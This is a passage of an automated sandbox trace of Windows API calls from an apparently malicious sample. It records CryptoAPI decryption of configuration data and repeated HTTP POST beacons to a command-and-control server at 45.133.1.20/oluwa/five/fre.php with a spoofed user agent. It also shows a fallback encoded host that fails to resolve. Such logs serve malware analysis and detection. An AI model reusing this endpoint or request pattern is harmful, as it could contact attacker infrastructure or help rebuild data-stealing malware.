lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0245.742] GetProcessHeap () returned 0x6a0000 [0245.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0245.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.743] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0245.762] GetProcessHeap () returned 0x6a0000 [0245.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0245.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.763] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0245.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.764] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.766] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.766] GetProcessHeap () returned 0x6a0000 [0245.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0245.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.768] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0245.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.769] CryptDestroyKey (hKey=0x6ad020) returned 1 [0245.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.771] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0245.771] GetProcessHeap () returned 0x6a0000 [0245.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0245.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.773] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0245.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.775] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0245.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.776] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0245.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.777] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0245.777] GetProcessHeap () returned 0x6a0000 [0245.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0245.777] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0245.777] GetProcessHeap () returned 0x6a0000 [0245.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0245.778] socket (af=2, type=1, protocol=6) returned 0x7f0 [0245.778] connect (s=0x7f0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0245.803] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0245.803] GetProcessHeap () returned 0x6a0000 [0245.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0245.804] GetProcessHeap () returned 0x6a0000 [0245.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0245.805] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0245.806] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.807] GetProcessHeap () returned 0x6a0000 [0245.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c48b8 [0245.807] GetProcessHeap () returned 0x6a0000 [0245.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0245.807] GetProcessHeap () returned 0x6a0000 [0245.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0245.807] GetProcessHeap () returned 0x6a0000 [0245.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0245.808] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0245.809] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.809] GetProcessHeap () returned 0x6a0000 [0245.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0245.809] GetProcessHeap () returned 0x6a0000 [0245.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0245.810] send (s=0x7f0, buf=0x6bd460*, len=242, flags=0) returned 242 [0245.811] send (s=0x7f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0245.811] GetProcessHeap () returned 0x6a0000 [0245.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0245.811] recv (in: s=0x7f0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0245.888] GetProcessHeap () returned 0x6a0000 [0245.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0245.889] GetProcessHeap () returned 0x6a0000 [0245.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0245.889] GetProcessHeap () returned 0x6a0000 [0245.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c48b8 | out: hHeap=0x6a0000) returned 1 [0245.890] GetProcessHeap () returned 0x6a0000 [0245.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0245.890] closesocket (s=0x7f0) returned 0 [0245.890] GetProcessHeap () returned 0x6a0000 [0245.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0245.891] GetProcessHeap () returned 0x6a0000 [0245.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0245.891] GetProcessHeap () returned 0x6a0000 [0245.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0245.891] GetProcessHeap () returned 0x6a0000 [0245.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0245.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1524) returned 0x7f0 [0245.897] Sleep (dwMilliseconds=0xea60) [0245.899] GetProcessHeap () returned 0x6a0000 [0245.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0245.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.907] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0245.982] GetProcessHeap () returned 0x6a0000 [0245.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0245.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.989] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0245.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.990] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.991] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.993] GetProcessHeap () returned 0x6a0000 [0245.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0245.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.997] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0245.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.998] CryptDestroyKey (hKey=0x6ad020) returned 1 [0245.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.999] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0245.999] GetProcessHeap () returned 0x6a0000 [0245.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.000] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.004] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.006] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.007] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.007] GetProcessHeap () returned 0x6a0000 [0246.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0246.007] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.007] GetProcessHeap () returned 0x6a0000 [0246.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0246.008] GetProcessHeap () returned 0x6a0000 [0246.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.008] GetProcessHeap () returned 0x6a0000 [0246.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0246.009] GetProcessHeap () returned 0x6a0000 [0246.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0246.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.010] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.018] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0246.026] GetProcessHeap () returned 0x6a0000 [0246.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0246.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.027] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0246.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.028] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.029] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.029] GetProcessHeap () returned 0x6a0000 [0246.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0246.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.030] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0246.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.031] CryptDestroyKey (hKey=0x6ad560) returned 1 [0246.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.032] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0246.032] GetProcessHeap () returned 0x6a0000 [0246.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.033] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0246.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.034] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0246.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.035] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0246.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.038] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0246.038] GetProcessHeap () returned 0x6a0000 [0246.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0246.038] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0246.038] GetProcessHeap () returned 0x6a0000 [0246.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0246.038] socket (af=2, type=1, protocol=6) returned 0x7f4 [0246.039] connect (s=0x7f4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0246.066] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0246.066] GetProcessHeap () returned 0x6a0000 [0246.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0246.067] GetProcessHeap () returned 0x6a0000 [0246.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0246.067] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.068] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.068] GetProcessHeap () returned 0x6a0000 [0246.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5578 [0246.068] GetProcessHeap () returned 0x6a0000 [0246.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0246.069] GetProcessHeap () returned 0x6a0000 [0246.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0246.069] GetProcessHeap () returned 0x6a0000 [0246.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0246.070] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.070] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.070] GetProcessHeap () returned 0x6a0000 [0246.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0246.071] GetProcessHeap () returned 0x6a0000 [0246.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0246.071] send (s=0x7f4, buf=0x6bd460*, len=242, flags=0) returned 242 [0246.072] send (s=0x7f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0246.072] GetProcessHeap () returned 0x6a0000 [0246.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0246.072] recv (in: s=0x7f4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0246.142] GetProcessHeap () returned 0x6a0000 [0246.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0246.142] GetProcessHeap () returned 0x6a0000 [0246.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0246.143] GetProcessHeap () returned 0x6a0000 [0246.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5578 | out: hHeap=0x6a0000) returned 1 [0246.144] GetProcessHeap () returned 0x6a0000 [0246.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0246.144] closesocket (s=0x7f4) returned 0 [0246.145] GetProcessHeap () returned 0x6a0000 [0246.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0246.145] GetProcessHeap () returned 0x6a0000 [0246.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.145] GetProcessHeap () returned 0x6a0000 [0246.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0246.146] GetProcessHeap () returned 0x6a0000 [0246.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0246.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1528) returned 0x7f4 [0246.148] Sleep (dwMilliseconds=0xea60) [0246.149] GetProcessHeap () returned 0x6a0000 [0246.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0246.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.150] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.161] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0246.169] GetProcessHeap () returned 0x6a0000 [0246.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0246.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.170] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0246.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.171] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.172] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.172] GetProcessHeap () returned 0x6a0000 [0246.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0246.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.174] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0246.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.175] CryptDestroyKey (hKey=0x6ad060) returned 1 [0246.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.176] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0246.176] GetProcessHeap () returned 0x6a0000 [0246.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.179] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.180] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.185] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.186] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.186] GetProcessHeap () returned 0x6a0000 [0246.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0246.186] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.187] GetProcessHeap () returned 0x6a0000 [0246.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0246.187] GetProcessHeap () returned 0x6a0000 [0246.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.188] GetProcessHeap () returned 0x6a0000 [0246.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0246.188] GetProcessHeap () returned 0x6a0000 [0246.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0246.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0246.203] GetProcessHeap () returned 0x6a0000 [0246.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0246.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.204] CryptImportKey (in: 